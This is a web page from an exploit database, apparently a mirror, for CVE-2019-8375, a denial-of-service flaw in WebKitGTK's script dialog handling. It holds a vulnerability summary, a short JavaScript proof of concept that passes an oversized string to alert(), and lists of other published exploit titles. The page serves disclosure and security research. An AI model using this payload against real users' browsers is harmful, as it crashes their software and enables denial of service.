Search for hundreds of thousands of exploits

"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service"

Author

Exploit author

"Dhiraj Mishra"

Platform

Exploit platform

linux

Release date

Exploit published date

2019-02-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#Exploit Title: Buffer overflow
# Date: 27-02-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://webkit.org/
# Software Link: https://gitlab.gnome.org/GNOME/epiphany
# Version: 2.23.90
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2019-8375
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-8375
# https://www.inputzero.io/2019/02/fuzzing-webkit.html

## Summary:
The UIProcess subsystem in WebKit, as used in WebKitGTK through 2.23.90 and
WebKitGTK+ through 2.22.6 and other products, does not prevent the script
dialog size from exceeding the web view size, which allows remote attackers
to cause a denial of service (Buffer Overflow) or possibly have unspecified
other impact, related to UIProcess/API/gtk/WebKitScriptDialogGtk.cpp,
UIProcess/API/gtk/WebKitScriptDialogImpl.cpp, and
UIProcess/API/gtk/WebKitWebViewGtk.cpp, as demonstrated by GNOME Web (aka
Epiphany).

## PoC:
<script>
   var a = '';
   for (var i = 1; i <= 5000; i++)
    {
       a += 'A';
    }
   alert(a);
</script>
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-04-23"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)"webappscgi"Dhiraj Mishra"
2020-02-06"VIM 8.2 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2019-06-06"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion"webappshardware"Dhiraj Mishra"
2019-05-27"Typora 0.9.9.24.6 - Directory Traversal"remotemacos"Dhiraj Mishra"
2019-04-30"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)"webappsjava"Dhiraj Mishra"
2019-04-26"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting"webappsjava"Dhiraj Mishra"
2019-04-18"Evernote 7.9 - Code Execution via Path Traversal"localmacos"Dhiraj Mishra"
2019-02-28"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service"doslinux"Dhiraj Mishra"
2019-01-21"GattLib 0.2 - Stack Buffer Overflow"remotelinux"Dhiraj Mishra"
2018-11-06"libiec61850 1.3 - Stack Based Buffer Overflow"locallinux"Dhiraj Mishra"
2018-08-23"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2018-08-14"cgit 1.2.1 - Directory Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-08-14"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-06-11"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)"doslinux"Dhiraj Mishra"
2018-06-05"WebKitGTK+ < 2.21.3 - Crash (PoC)"locallinux"Dhiraj Mishra"
2018-06-01"Epiphany 3.28.2.1 - Denial of Service"dosmultiple"Dhiraj Mishra"
2018-04-05"WebRTC - Private IP Leakage (Metasploit)"webappsmultiple"Dhiraj Mishra"
2017-12-20"Samsung Internet Browser - SOP Bypass (Metasploit)"remoteandroid"Dhiraj Mishra"
2017-09-02"IBM Notes 8.5.x/9.0.x - Denial of Service"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (2)"dosmultiple"Dhiraj Mishra"
2017-08-30"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery"webappsruby"Dhiraj Mishra"
2017-08-09"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery"webappsmultiple"Dhiraj Mishra"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46465/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.